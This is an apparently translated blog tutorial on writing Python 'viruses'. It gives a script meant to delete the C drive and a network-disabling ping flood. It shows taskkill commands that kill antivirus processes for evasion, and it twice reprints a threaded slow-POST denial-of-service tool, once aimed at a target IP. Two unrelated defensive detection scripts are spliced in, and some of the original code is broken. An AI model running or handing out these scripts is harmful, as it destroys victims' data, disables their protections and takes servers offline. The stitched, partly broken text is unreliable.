Python virus: advanced version

Introduction

Well, I have written many articles before. This time I will write an advanced version of the virus article, which is a little long!

Notes before reading

If you don't like it, don't flame me! Also, if you have a question, don't message me privately; I don't have time to read private messages. Just leave a comment at the bottom of the article. All the techniques in this article are the results of my own research, so don't plagiarize! Please obey the law.

Other languages

This article uses Python, but you can also use other languages.

Preparation

If you are reading my article for the first time, please be prepared:

1. VirtualBox

Search Baidu for the VirtualBox software, click download, and install it by following the wizard.

2. Image file

Search Baidu for "MSDN I Tell You". Click the operating system and select the appropriate version in the check box on the right. Here, take Windows 7 Enterprise (x86) as an example.

Then copy the ed2k link and download it with Xunlei.

3. Install the virtual machine

Next, create a virtual machine and select the appropriate parameters. Since everyone's situation is different, I won't say more. Finally, select the image file.

4. Install Python

I will not elaborate here. Download the version that fits your actual situation.

Basics

Previously, I published an article on Chrome vulnerability analysis. In it, I gave an example to practice finding the vulnerabilities in code that hackers might exploit; that time it was a database file. This is the foundation of vulnerability work. I will publish an article later explaining CTF practice and vulnerability fundamentals.

Writing a Trojan

We have written several Trojans before. Now let's take a look at this piece of code:

import tkinter
import subprocess
del = subprocess.call("del C:\ ", shell=True)
window = tk.Tk()
window.withdraw()  
window.mainloop()  

This code is a powerful Trojan. Many users habitually click "Yes" and "OK" when a window pops up. However, if you run into this Trojan, it will delete your C drive outright, which means your system can no longer be used, because most system files live on the C drive. The last three lines are meant to make it run in the background.

So far, we have only seen generally destructive viruses. We will learn some more advanced viruses later. But before that, let's look at another piece of code:

import os
import subprocess
os.system("net stop service")
ping = subprocess.call("ping -t -l 100 ip address", shell=True)
window = tk.Tk()
window.withdraw()  
window.mainloop()

See? This is a simple network-disconnection virus. At the same time, it carries out a network-flooding attack from this computer, and it runs in the background, so users should not notice it. net stop service is a CMD command that stops a network service.
So far, we have learned a lot of Trojans. Although these Trojans are not powerful, this is the first time we have written some viruses, which is no small achievement. However, if you practice, you will find that some operations get recognized by antivirus software. What should you do then?

Evading antivirus

We write code to evade antivirus detection.

import os
os.system(r'taskkill /F /IM 360safe.exe')

360safe is the process name of 360 Safeguard. You can also use tools to do this, such as junk-code ("flower instruction") inserters. However, these tools often contain viruses themselves, so it is recommended to use them inside the virtual machine.
In practice, deception is a skill that hackers must learn. Only when they know how to disguise themselves will their viruses go undiscovered.

Practical exercise

I know that many people like to watch cyber security competitions. After mastering these skills, we can set up a competition ourselves, but it requires the strength of a team. For example, your teammates are:

a b c x y......

Competition rules

Here is the information about the computer to be attacked:
Windows 7 Ultimate 64-bit
Antivirus software: Kingsoft Antivirus (Duba)
Python environment installed
IP address: 10.7.0 (redacted here)

Scenario: one day, a computer user downloads a piece of virus software from a website, and the software was written by you.
You are required to write the virus code and the website code, and achieve antivirus evasion.

Analysis

First, the virus source can simply reuse the code above, for example the network-disconnection Trojan, so the source file is as follows:
virus.py

import os
import subprocess
os.system("net stop service")
ping = subprocess.call("ping -t -l 100 10.7.0", shell=True)
window = tk.Tk()
window.withdraw()  
window.mainloop()

Then it is packaged as virus.exe.

Next is the code of the website, where the default flask page is public and accessible to all:
website.py

from flask import Flask
app = Flask(__name__)
@app.route('/')
def downloud():
	# part of the code is omitted here
if __name__ == "__main__":
	app.run(debug=True)

After that, the next step is antivirus evasion. The process name is kxetray.exe; just refer to the previous code.
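The antivirus-kill trick above (taskkill against 360safe.exe here and kxetray.exe in the exercise) is easy to spot from process-creation telemetry. The following is an added detection example, not code from the original post; the event tuple format and the sample events are constructed assumptions.

```python
import re
from dataclasses import dataclass

# Process names the post itself names as antivirus targets; extend with your own product list.
PROTECTED_PROCESSES = {"360safe.exe", "kxetray.exe"}
# Matches "taskkill" or "taskkill.exe" followed by an /IM <image> argument, any case.
TASKKILL_RE = re.compile(r"taskkill(?:\.exe)?\b.*?/IM\s+(?P<image>\S+)", re.IGNORECASE)


@dataclass
class Finding:
    host: str
    parent: str
    target: str


def detect_av_kill(events):
    """events: iterable of (host, parent_image, command_line) tuples, as a
    process-creation telemetry source would provide (assumed shape).
    Returns one Finding per taskkill whose /IM target is a protected process."""
    findings = []
    for host, parent, cmdline in events:
        m = TASKKILL_RE.search(cmdline)
        if m and m["image"].lower() in PROTECTED_PROCESSES:
            findings.append(Finding(host, parent, m["image"].lower()))
    return findings


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    ("ws01", "python.exe", r"taskkill /F /IM 360safe.exe"),
    ("ws01", "cmd.exe", r"taskkill /F /IM notepad.exe"),
    ("ws02", "virus.exe", r"C:\Windows\System32\taskkill.exe /f /im KXETRAY.EXE"),
    ("ws03", "explorer.exe", r"ping -t -l 100 10.7.0"),
]

if __name__ == "__main__":
    for f in detect_av_kill(SAMPLE_EVENTS):
        print(f"{f.host}: {f.parent} tried to kill {f.target}")
```

Alerting on the parent image as well (a script interpreter or an unsigned download spawning taskkill) is what separates this from an administrator legitimately restarting a product.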

Intermediate

DDoS distributed attack

The previous viruses were simple and had demanding preconditions. So now we want to create a more powerful virus that only needs to know the IP address to attack: a DDoS attack. Here I reprint part of another blogger's article. Original address: https://blog.csdn.net/tiantian520ttjs/article/details/103107836 .
A Distributed Denial of Service (DDoS) attack means that multiple attackers in different locations attack one or more targets at the same time, or that one attacker controls multiple machines in different locations and uses them to attack the victim simultaneously. Since the attack points are distributed in different places, this kind of attack is called a distributed denial of service attack, and there can be multiple attackers.

import socket
import time
import threading
#Pressure Test,ddos tool

#---------------------------
MAX_CONN=20000
PORT=80
HOST=""#Enter the IP or domain name of the other party in double quotation marks to ensure that it is connected or powered on
PAGE="/index.php"
#---------------------------

buf=("POST %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Length: 10000000\r\n"
"Cookie: dklkt_dos_test\r\n"
"\r\n" % (PAGE,HOST))
 
socks=[]
 
def conn_thread():
    global socks
    for i in range(0,MAX_CONN):
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        try:
            s.connect((HOST,PORT))
            s.send(buf.encode())
            print ("Send buf OK!,conn=%d\n"%i)
            socks.append(s)
        except Exception as ex:
            print ("Could not connect to server or send error:%s"%ex)
            time.sleep(0.1)
#end def
 
def send_thread():
    global socks
    while True:
        for s in socks:
            try:
                s.send("f".encode())
                #print "send OK!"
            except Exception as ex:
                print ("Send Exception:%s\n"%ex)
                socks.remove(s)
                s.close()
        time.sleep(0.1)
#end def
 
conn_th=threading.Thread(target=conn_thread,args=())
send_th=threading.Thread(target=send_thread,args=())
 
conn_th.start()
send_th.start()

Original link: https://blog.csdn.net/tiantian520ttjs/article/details/103107836
The above is the source code of a DDoS attack. Now we can use this program to organize a large DDoS attack.

Web part

If you are careful, you will notice that each of my articles has a Web part. Why should we learn the Web? Because today everyone depends on the Internet, and browsers and pages are everywhere. As hackers or programmers, if we want to build for the network, we cannot do without the basic parts of the Web, including TCP/IP, SQL, HTML/CSS parsing, Web crawlers and much other knowledge. Most of it is abstract and hard to learn, so we learn a little at a time and don't get tired.

while True:
	print("Come on!")

I won't elaborate more here, because I really can't think of what to write.
But don't lose heart, because in the advanced chapter there will be a big practical project.

Advanced

Competition rules

Here is the information about the computer to be attacked:
Windows 10 Ultimate 64-bit
Antivirus software: Kingsoft Antivirus (Duba)
IP address: 10.7.1 (redacted here)

Requirement: attack this computer with the DDoS method and evade antivirus.

Analysis

First, for the code section, you can directly reuse the code above.
ddos.py

import socket
import time
import threading
#Pressure Test,ddos tool

#---------------------------
MAX_CONN=20000
PORT=80
HOST="10.7.1"#Enter the IP or domain name of the other party in double quotation marks to ensure that it is connected or powered on
PAGE="/index.php"
#---------------------------

buf=("POST %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Length: 10000000\r\n"
"Cookie: dklkt_dos_test\r\n"
"\r\n" % (PAGE,HOST))
 
socks=[]
 
def conn_thread():
    global socks
    for i in range(0,MAX_CONN):
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        try:
            s.connect((HOST,PORT))
            s.send(buf.encode())
            print ("Send buf OK!,conn=%d\n"%i)
            socks.append(s)
        except Exception as ex:
            print ("Could not connect to server or send error:%s"%ex)
            time.sleep(0.1)
#end def
 
def send_thread():
    global socks
    while True:
        for s in socks:
            try:
                s.send("f".encode())
                #print "send OK!"
            except Exception as ex:
                print ("Send Exception:%s\n"%ex)
                socks.remove(s)
                s.close()
        time.sleep(0.1)
#end def
 
conn_th=threading.Thread(target=conn_thread,args=())
send_th=threading.Thread(target=send_thread,args=())
 
conn_th.start()
send_th.start()

Antivirus evasion was covered just above, so I won't show more. Soon the computer will become unusable from the overload. We can also combine this with the network-congestion attack.
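The reprinted tool in both the Intermediate and Advanced sections has a recognisable footprint on the server side: many connections from one source, each declaring a 10,000,000-byte POST body and then trickling single bytes to keep the connection open. The following is an added detection example, not code from the original post or the reprinted article; the connection-snapshot line format, the thresholds and the sample data are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed connection-table snapshot (assumed format, not from any real proxy):
# each line is one open client connection as a reverse proxy or WAF might dump it.
SAMPLE_SNAPSHOT = "\n".join(
    [f"src=10.7.0.5 conn={i} declared=10000000 received={40 + i % 5} open=120"
     for i in range(60)]                                          # one source, 60 stalled POSTs
    + [f"src=10.7.0.9 conn={i} declared=10000000 received=9800000 open=12"
       for i in range(3)]                                         # large but healthy uploads
    + ["src=10.7.0.12 conn=0 declared=512 received=512 open=1"]   # ordinary request
    + ["this line is malformed and must be skipped"]
)

LINE_RE = re.compile(
    r"src=(?P<src>\S+) conn=(?P<conn>\d+) declared=(?P<declared>\d+) "
    r"received=(?P<received>\d+) open=(?P<open>\d+)")


def parse_snapshot(text):
    """Yield (src, declared_bytes, received_bytes, open_seconds) per well-formed line."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield (m["src"], int(m["declared"]), int(m["received"]), int(m["open"]))


def slow_post_sources(text, min_conns=20, min_declared=1_000_000, max_rate=100.0):
    """Return {src: stalled_count} for sources holding at least min_conns connections
    that each declare >= min_declared body bytes yet deliver < max_rate bytes/second.
    A large body arriving at normal speed is not stalled and is not counted."""
    stalled = defaultdict(int)
    for src, declared, received, open_s in parse_snapshot(text):
        if open_s <= 0:
            continue
        if declared >= min_declared and received / open_s < max_rate:
            stalled[src] += 1
    return {src: n for src, n in stalled.items() if n >= min_conns}


if __name__ == "__main__":
    for src, n in slow_post_sources(SAMPLE_SNAPSHOT).items():
        print(f"{src}: {n} stalled POST connections")
```

The usual countermeasure this feeds is a per-source concurrent-connection cap and a request-body receive timeout at the proxy, so stalled connections are dropped before the worker pool is exhausted.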

Conclusion

Well, I wrote such a long article today. I hope you like it. If you don't mind, please follow me; that is my motivation.
Goodbye

Posted by aktome2001 on Wed, 01 Jun 2022 00:32:53 +0530